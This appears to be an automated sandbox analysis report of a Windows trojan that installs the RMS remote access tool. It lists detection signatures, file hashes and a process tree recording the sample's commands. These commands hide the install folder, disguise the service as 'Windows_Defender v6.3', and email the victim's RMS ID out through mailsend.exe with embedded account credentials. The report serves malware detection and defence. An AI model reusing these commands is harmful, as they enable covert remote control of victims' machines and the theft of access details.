Overview

overview

10

Static

static

3

de2a25f8ea...18.exe

windows7-x64

10

de2a25f8ea...18.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-09-2024 09:51

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe

  • Size

    4.5MB

  • MD5

    de2a25f8ead1eab33b2648789c06531f

  • SHA1

    24da52206a2b4a09ef84da764cd4550e5ffb7cec

  • SHA256

    793135f920a0b239cff6880c6d9b939a5e2f26e11c063ce1b3b1f35c30e27aff

  • SHA512

    63f5c043a8128bb406cc67bf5329d61f7eb21c9052deddb143badb2fd830565635e4738cce80190766a8f914ca0f3265818e3985967b3033d9668c29dd1f8ea0

  • SSDEEP

    98304:HKF7KQF1iEaGzM038RzYf0ML2x5tTDaLclizt5CJ:HS7KQrLM/RzYI7Da4Ic

Score
10/10
rmsaspackv2discoveryevasionrattrojanupx

Malware Config

Signatures

  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

    trojanratrms
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    evasion
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

    aspackv2
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 35 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Kills process with taskkill 4 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Runs .reg file with regedit 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 7 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\de2a25f8ead1eab33b2648789c06531f_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3520
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files (x86)\System\install.vbs"
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2124
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\System\install.bat" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3344
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Program Files (x86)\System" +H +S /S /D
          4⤵
          • Sets file to hidden
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1308
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Program Files (x86)\System\*.*" +H +S /S /D
          4⤵
          • Sets file to hidden
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:4916
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im rutserv.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:5020
        • C:\Windows\SysWOW64\taskkill.exe
          Taskkill /f /im rutserv.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2960
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im rfusclient.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:4972
        • C:\Windows\SysWOW64\taskkill.exe
          Taskkill /f /im rfusclient.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3456
        • C:\Windows\SysWOW64\reg.exe
          reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2296
        • C:\Windows\SysWOW64\regedit.exe
          regedit /s "regedit.reg"
          4⤵
          • System Location Discovery: System Language Discovery
          • Runs .reg file with regedit
          PID:1388
        • C:\Windows\SysWOW64\timeout.exe
          timeout 2
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:1700
        • C:\Program Files (x86)\System\rutserv.exe
          rutserv.exe /silentinstall
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:1520
        • C:\Program Files (x86)\System\rutserv.exe
          rutserv.exe /firewall
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          PID:540
        • C:\Program Files (x86)\System\rutserv.exe
          rutserv.exe /start
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:4028
        • C:\Windows\SysWOW64\sc.exe
          sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:740
        • C:\Windows\SysWOW64\sc.exe
          sc config RManService obj= LocalSystem type= interact type= own
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:1452
        • C:\Windows\SysWOW64\sc.exe
          sc config RManService DisplayName= "Windows_Defender v6.3"
          4⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:4556
        • C:\Windows\SysWOW64\timeout.exe
          timeout 120
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:2056
        • C:\Windows\SysWOW64\reg.exe
          reg export "HKEY_LOCAL_MACHINE\SYSTEM\Remote Manipulator System\v4" "id.txt"
          4⤵
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          PID:3152
        • C:\Windows\SysWOW64\timeout.exe
          timeout 10
          4⤵
          • System Location Discovery: System Language Discovery
          • Delays execution with timeout.exe
          PID:2200
        • C:\Program Files (x86)\System\mailsend.exe
          mailsend.exe -t [email protected] -attach id.txt,application/txt -sub "RMS" -smtp smtp.mail.ru -port 465 -f [email protected] -name "RMS" -ssl -auth-login -user [email protected] -pass 251103olin -q
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:3916
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Program Files (x86)\System\regedit.reg" -S -H /S /D
          4⤵
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:2884
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Program Files (x86)\System\mailsend.exe" -S -H /S /D
          4⤵
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:4200
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Program Files (x86)\System\id.txt" -S -H /S /D
          4⤵
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:1932
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Program Files (x86)\System\install.vbs" -S -H /S /D
          4⤵
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:3656
        • C:\Windows\SysWOW64\attrib.exe
          attrib "C:\Program Files (x86)\System\install.bat" -S -H /S /D
          4⤵
          • Drops file in Program Files directory
          • System Location Discovery: System Language Discovery
          • Views/modifies file attributes
          PID:644
  • C:\Program Files (x86)\System\rutserv.exe
    "C:\Program Files (x86)\System\rutserv.exe"
    1⤵
    • Executes dropped EXE
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4632
    • C:\Program Files (x86)\System\rfusclient.exe
      "C:\Program Files (x86)\System\rfusclient.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3648
      • C:\Program Files (x86)\System\rfusclient.exe
        "C:\Program Files (x86)\System\rfusclient.exe" /tray
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: SetClipboardViewer
        PID:4644
    • C:\Program Files (x86)\System\rfusclient.exe
      "C:\Program Files (x86)\System\rfusclient.exe" /tray
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3080

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Program Files (x86)\System\install.bat
    Filesize

    1KB

    MD5

    3a00cb0db76a38b673ef3e40a250e331

    SHA1

    d0c2d511af06b1cf447d8ad05ca6c9e7afaf6e1e

    SHA256

    8f39fafe34285c8f14cbf4b851d84f13495097869cea061c05c1fcdff5c47b7f

    SHA512

    39a1f80fdc5566f7e5ba40e9ae245030d29fa4f9f3d6060f0cb878bd2341c47c915bda7c36aecf4382c4565326a2c6fce2742b5b86a389cf008790e0a3d5407b

    Download Submit

  • C:\Program Files (x86)\System\install.vbs
    Filesize

    120B

    MD5

    c719a030434d3fa96d62868f27e904a6

    SHA1

    f2f750a752dd1fda8915a47b082af7cf2d3e3655

    SHA256

    2696ee4302a85c6b4101fc6d1ce8e38b94fd9c2bbd1acc73b553576b3aacb92f

    SHA512

    47a9367f7596d19c0636766cd34ca3701d3b1239a284f2333fd04a48422f53b0df21002fd38a4f229f6a2f9f9e8163267e13ecb24d9ce6de1863d5f59ab04ff0

    Download Submit

  • C:\Program Files (x86)\System\mailsend.exe
    Filesize

    1.2MB

    MD5

    ac23b87f8ec60ddd3f555556f89a6af8

    SHA1

    3cea6f84757d15ee8d7fa19d3dfc4992c50aa90c

    SHA256

    80a1d0a15066c7af67cf5377e59e450c2a96018505236f8f3352173282b27ae4

    SHA512

    57e67eab9c2a3b94161500eb0091533a539454e9bfddd47c61477299de9455b7ca11c498c5d8a7d77f4763a2053acb4ff96868a9313fede29969edc16d35b167

    Download Submit

  • C:\Program Files (x86)\System\regedit.reg
    Filesize

    12KB

    MD5

    251212852a073e6fc5fbe3af92f66adb

    SHA1

    6ee07cb20f57830325c11867e68fea49ae0e87ea

    SHA256

    f2c83f4cc13b0cd28090dd128ec5ff221681118f6100eddaead88526070ceecb

    SHA512

    f3853ece99edc6d39edbf1c7bca471e71aa034684a85358b033e50418ffa061f1e8724cba76065048901c20c9f9a6dbd86a17ee33756c0452d4d3358047296be

    Download Submit

  • C:\Program Files (x86)\System\rfusclient.exe
    Filesize

    1.5MB

    MD5

    b8667a1e84567fcf7821bcefb6a444af

    SHA1

    9c1f91fe77ad357c8f81205d65c9067a270d61f0

    SHA256

    dc9d875e659421a51addd8e8a362c926369e84320ab0c5d8bbb1e4d12d372fc9

    SHA512

    ec6af663a3b41719d684f04504746f91196105ef6f8baa013b4bd02df6684eca49049d5517691f8e3a4ba6351fe35545a27f728b1d29d949e950d574a012f852

    Download Submit

  • C:\Program Files (x86)\System\rutserv.exe
    Filesize

    1.7MB

    MD5

    37a8802017a212bb7f5255abc7857969

    SHA1

    cb10c0d343c54538d12db8ed664d0a1fa35b6109

    SHA256

    1699b9b4fc1724f9b0918b57ca58c453829a3935efd89bd4e9fa66b5e9f2b8a6

    SHA512

    4e20141da8ea4499daf8be5cc41b664dc4229e9575765caf6dc5873d8d0a09f9e200988e1404e767d0415005876a4cf38d5737bd3e1b2c12c4a8fb28adb4f0a0

    Download Submit

  • C:\Program Files (x86)\System\vp8decoder.dll
    Filesize

    155KB

    MD5

    88318158527985702f61d169434a4940

    SHA1

    3cc751ba256b5727eb0713aad6f554ff1e7bca57

    SHA256

    4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74

    SHA512

    5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff

    Download Submit

  • C:\Program Files (x86)\System\vp8encoder.dll
    Filesize

    593KB

    MD5

    6298c0af3d1d563834a218a9cc9f54bd

    SHA1

    0185cd591e454ed072e5a5077b25c612f6849dc9

    SHA256

    81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172

    SHA512

    389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\REG7843.tmp
    Filesize

    20KB

    MD5

    4c8339fff773238e20a411f3f69944e6

    SHA1

    5eef38dd7565a6dfbfea96cc3c253dc8e34bbc0c

    SHA256

    3636426df758336adb13484c29fbcec868cc4c6c7735b341903751d7199bd4ff

    SHA512

    63aef088c6dcca7a9b1776acc79f5e1ba159747ef1591ba2b81d19a849c2e120231634ed048b474f463e69f3904c1668977b12f027a29971b597a30af8f5f529

    Download Submit

  • \??\PIPE\wkssvc
    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

    Download Submit

  • memory/540-39-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/540-43-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/540-37-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/540-40-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/540-41-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/540-36-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/540-38-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/1520-27-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/1520-34-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/1520-29-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/1520-32-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/1520-31-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/1520-30-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/1520-28-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/3080-89-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3080-93-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3080-100-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3080-86-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3080-68-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3080-69-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3080-71-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3080-70-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3080-73-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3080-110-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3080-67-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3648-60-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3648-64-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3648-63-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3648-61-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3648-85-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3648-66-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/3648-62-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/4028-47-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4028-49-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4028-50-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4028-45-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4028-46-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4028-72-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4028-48-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-52-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-98-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-53-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-54-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-115-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-84-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-57-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-56-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-87-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-108-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-91-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-55-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4632-94-0x0000000000400000-0x0000000000AB9000-memory.dmp

    Filesize

    6.7MB

    Download

  • memory/4644-82-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/4644-77-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/4644-78-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/4644-81-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/4644-83-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/4644-80-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/4644-79-0x0000000000400000-0x00000000009B6000-memory.dmp

    Filesize

    5.7MB

    Download